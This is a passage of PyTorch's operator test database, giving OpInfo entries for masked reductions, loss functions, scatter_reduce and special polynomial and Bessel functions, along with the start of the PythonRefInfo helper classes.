# FIXME: amin reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ...
(used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmax', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmax DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.argmin', supports_out=False, supports_multiple_dims=False, supports_autograd=False, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # initial is not a keyword for argmin DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.mean', ref=reference_reduction_numpy(np.mean) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), skips=( DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_duplicate_values', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_reference_masked', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_ref_small_input', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), OpInfo( '_masked.median', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_masked_softmax, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.norm', identity=0, method_variant=None, nan_policy='propagate', supports_out=False, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # torch.jit.frontend.NotSupportedError: Compiled functions # can't take variable number of arguments or use # keyword-only arguments with defaults DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_norm, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.var', ref=reference_reduction_numpy(np.var) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02), torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), ReductionOpInfo( '_masked.std', ref=reference_reduction_numpy(np.std) if np.lib.NumpyVersion(np.__version__) >= '1.20.2' else None, method_variant=None, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: sum reduces all dimensions when dim=[] 
DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestReductions', 'test_ref_small_input'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], sample_inputs_func=sample_inputs_masked_std_var, gradcheck_wrapper=gradcheck_wrapper_masked_operation, check_batched_grad=True, check_batched_forward_grad=True, ), OpInfo( '_masked.softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.log_softmax', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1e-02)}), 'TestMasked', 'test_reference_masked'), ], gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.softmin', method_variant=None, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_softmax, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), gradcheck_wrapper=gradcheck_wrapper_masked_operation, supports_forward_ad=True, supports_out=False), OpInfo( '_masked.normalize', method_variant=None, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_normalize, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), 
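# (General note on the _masked.* entries in this block -- hedged, since the
# exact signatures live in torch/_masked: masked reductions only consider
# elements where the mask is True, conceptually e.g.
#
#     torch._masked.sum(t, dim, mask=m)  ~  torch.where(m, t, torch.zeros_like(t)).sum(dim)
#
# with the analogous identity fill value for prod/amax/amin.)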
            DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
            # Preexisting issue with linalg.vector_norm
            DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]),
            # RuntimeError: "clamp_min_cpu" not implemented for 'Half'
            DecorateInfo(unittest.expectedFailure, 'TestMasked', 'test_reference_masked', device_type='cpu', dtypes=[torch.half]),
        ),
        gradcheck_wrapper=gradcheck_wrapper_masked_operation,
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        supports_out=False),
    OpInfo(
        "nn.functional.ctc_loss",
        ref=_NOTHING,
        dtypes=floating_types(),
        supports_out=False,
        sample_inputs_func=sample_inputs_ctc_loss,
        skips=(
            # https://github.com/pytorch/pytorch/issues/67462
            # torch.autograd.gradcheck.GradcheckError: Jacobian mismatch for output 0 with respect to input 0
            DecorateInfo(
                unittest.expectedFailure,
                "TestGradients",
                "test_fn_grad",
                dtypes=(torch.float64,),
            ),
            # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented
            DecorateInfo(
                unittest.expectedFailure,
                "TestGradients",
                "test_fn_gradgrad",
                dtypes=(torch.float64,),
            ),
            # RuntimeError: derivative for aten::_ctc_loss_backward is not implemented
            DecorateInfo(
                unittest.skip("Skipped!"),
                "TestJit",
                "test_variant_consistency_jit",
                dtypes=(torch.float32,),
            ),
            # Operation calls data_ptr() somewhere; needs to be fixed
            DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'),
            DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'),
        ),
    ),
    OpInfo(
        "nn.functional.cosine_embedding_loss",
        ref=_NOTHING,
        dtypes=all_types_and(torch.bfloat16, torch.bool),
        dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16, torch.bool),
        supports_out=False,
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        sample_inputs_func=sample_inputs_cosine_embedding_loss,
    ),
    OpInfo(
        "nn.functional.nll_loss",
        ref=_NOTHING,
        dtypes=floating_types_and(torch.bfloat16),
        dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
        supports_out=False,
        sample_inputs_func=sample_inputs_nll_loss,
        supports_forward_ad=True,
        assert_jit_shape_analysis=True,
        skips=(
            # RuntimeError:
            # undefined value tensor:
            #   File "<string>", line 3
            # def the_method(i0, i1):
            #     return torch.nn.functional.nll_loss(i0, i1, weight=tensor([8.4784, 1.7658, 4.3228], dtype=torch.float32))
            #                                                        ~~~~~~ <--- HERE
            DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),),
        ),
    ),
    OpInfo(
        "nn.functional.gaussian_nll_loss",
        ref=_NOTHING,
        dtypes=floating_types_and(torch.bfloat16),
        dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
        supports_out=False,
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        sample_inputs_func=sample_inputs_gaussian_nll_loss,
        skips=(
            DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'),
            # JIT does not support variadic tensors.
            # RuntimeError: input->type()->kind() == TypeKind::OptionalType
            # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270,
            # please report a bug to PyTorch.
DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ) ), OpInfo( "nn.functional.hinge_embedding_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hinge_embedding_loss, error_inputs_func=error_inputs_hinge_embedding_loss, reference_inputs_func=reference_inputs_hinge_embedding_loss, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ) ), OpInfo( "nn.functional.huber_loss", aten_backward_name='huber_loss_backward', ref=_NOTHING, dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, sample_inputs_func=sample_inputs_huber_loss, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ) ), OpInfo( "nn.functional.pdist", ref=reference_pdist, sample_inputs_func=sample_inputs_pdist, dtypes=floating_types(), supports_out=False, supports_gradgrad=False), OpInfo( "nn.functional.poisson_nll_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_poisson_nll_loss, ), OpInfo( "argsort", dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_argsort, supports_out=False, supports_autograd=False, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), OpInfo( "repeat_interleave", dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_repeat_interleave, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.pairwise_distance", ref=lambda a, b, p=2.0, eps=1e-6, keepdim=False: ( np.sum(np.abs(a - b + eps) ** p, axis=-1, keepdims=keepdim) ** (1 / p) ), sample_inputs_func=sample_inputs_pairwise_distance, dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo( "nn.functional.pixel_shuffle", sample_inputs_func=sample_inputs_pixel_shuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( 
"nn.functional.pixel_unshuffle", sample_inputs_func=sample_inputs_pixel_unshuffle, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo( unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32, torch.complex64), ), ), ), OpInfo( "nn.functional.kl_div", sample_inputs_func=sample_inputs_kl_div, dtypes=floating_types_and(torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), backward_dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), dtypesIfCUDA=floating_types_and( torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64 ), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16, torch.int8, torch.int16, torch.int32, torch.int64), supports_out=False, check_batched_grad=False, supports_forward_ad=True, skips=( # See https://github.com/pytorch/pytorch/issues/65466 DecorateInfo( unittest.expectedFailure, "TestGradients", "test_fn_gradgrad", ), ), ), OpInfo( "diagflat", ref=lambda input, offset=0: np.diagflat(input, k=offset), sample_inputs_func=sample_inputs_diagflat, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( 'scatter_reduce', variant_test_name='sum', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='prod', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='mean', # complex not added to dtypes as complex gradients are not properly handled # and scatter_reduce hasn't been added to the whitelist in gen_variable_type yet dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amin', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), OpInfo( 'scatter_reduce', variant_test_name='amax', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_reduce, ), UnaryUfuncInfo( 'special.bessel_j0', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_j1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.j1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y0', decorators=( precisionOverride( { torch.float32: 
1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.bessel_y1', decorators=( precisionOverride( { torch.float32: 1e-04, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.y1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_h', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.hermite_polynomial_he', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.laguerre_polynomial_l', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.legendre_polynomial_p', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i0 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_i1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.i1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k0', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k0 if TEST_SCIPY else _NOTHING, 
supports_autograd=False, ), UnaryUfuncInfo( 'special.modified_bessel_k1', decorators=( precisionOverride( { torch.float32: 1e-03, torch.float64: 1e-05, }, ), ), dtypes=all_types_and(torch.bool), ref=scipy.special.k1 if TEST_SCIPY else _NOTHING, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_t', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_u', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_v', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), BinaryUfuncInfo( 'special.shifted_chebyshev_polynomial_w', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo'), ), supports_one_python_scalar=True, supports_autograd=False, ), ] # NOTE [Python References] # Python References emulate existing PyTorch operations, but can ultimately # be expressed in terms of "primitive" operations from torch._prims. # # These references are experimental. # See https://dev-discuss.pytorch.org/t/tracing-with-primitives-update-0/577 # for additional context. # # Python Reference OpInfos should be added to the python_ref_db list below. # Tests can opt-into running on these references by including # that list in the Sequence they pass to the @ops decorator. # # When a Python Reference OpInfo is constructed a pointer to an # existing OpInfo must be provided using the torch_opinfo_name kwarg. # The existing OpInfo with that name and no variant will be found # to inherit from. # # Instead of just inheriting the existing OpInfo's metadata, the # Python Reference OpInfos inherit the existing OpInfo's # construction arguments. These arguments can be overridden # by adding kwargs to the constructor. def _find_referenced_opinfo(referenced_name): ''' Finds the OpInfo with the given name that has no variant name. 
    '''
    for opinfo in op_db:
        if opinfo.name == referenced_name and opinfo.variant_test_name == '':
            return opinfo

def _inherit_constructor_args(name, op, inherited, overrides):
    # inherits metadata
    common_kwargs = {
        'name': name,
        'op': op,
        'aliases': None,  # TODO add a check for alias coverage
        'method_variant': None,
        'inplace_variant': None,  # TODO: add a check for inplace coverage
        'supports_scripting': False,
    }

    # Acquires inherited kwargs
    kwargs = inherited.copy()

    # Fixes metadata
    if 'kwargs' in kwargs:
        kwargs.update(kwargs['kwargs'])
        del kwargs['kwargs']
    if 'self' in kwargs:
        del kwargs['self']
    if '__class__' in kwargs:
        del kwargs['__class__']
    if 'skips' in kwargs:
        del kwargs['skips']
    if 'decorators' in kwargs:
        del kwargs['decorators']

    # Overrides metadata
    kwargs.update(common_kwargs)
    kwargs.update(overrides)

    kwargs['supports_autograd'] = False
    kwargs['supports_gradgrad'] = False
    kwargs['supports_fwgrad_bwgrad'] = False
    kwargs['supports_inplace_autograd'] = False
    kwargs['supports_forward_ad'] = False

    return kwargs

class PythonRefInfo(OpInfo):
    '''
    An OpInfo for a Python reference of an OpInfo base class operation.
    '''
    def __init__(
            self,
            name,  # the string name of the callable Python reference
            *,
            op=None,  # the function variant of the operation, populated as torch.<name> if None
            torch_opinfo_name,  # the string name of the corresponding torch opinfo
            validate_view_consistency=True,
            **kwargs):  # additional kwargs override kwargs inherited from the torch opinfo

        self.torch_opinfo_name = torch_opinfo_name
        self.torch_opinfo = _find_referenced_opinfo(torch_opinfo_name)
        self.validate_view_consistency = validate_view_consistency
        assert isinstance(self.torch_opinfo, OpInfo)

        inherited = self.torch_opinfo._original_opinfo_args
        ukwargs = _inherit_constructor_args(name, op, inherited, kwargs)

        super(PythonRefInfo, self).__init__(**ukwargs)

class ReductionPythonRefInfo(ReductionOpInfo):
    '''
    An OpInfo for a Python reference of a reduction operation.
    '''
    def __init__(
            self,
            name,  # the string name of the callable Python reference
            *,
            op=None,  # the function variant of the operation, populated as torch.<name> if None
            torch_opinfo_name,  # the string name of the corresponding torch opinfo
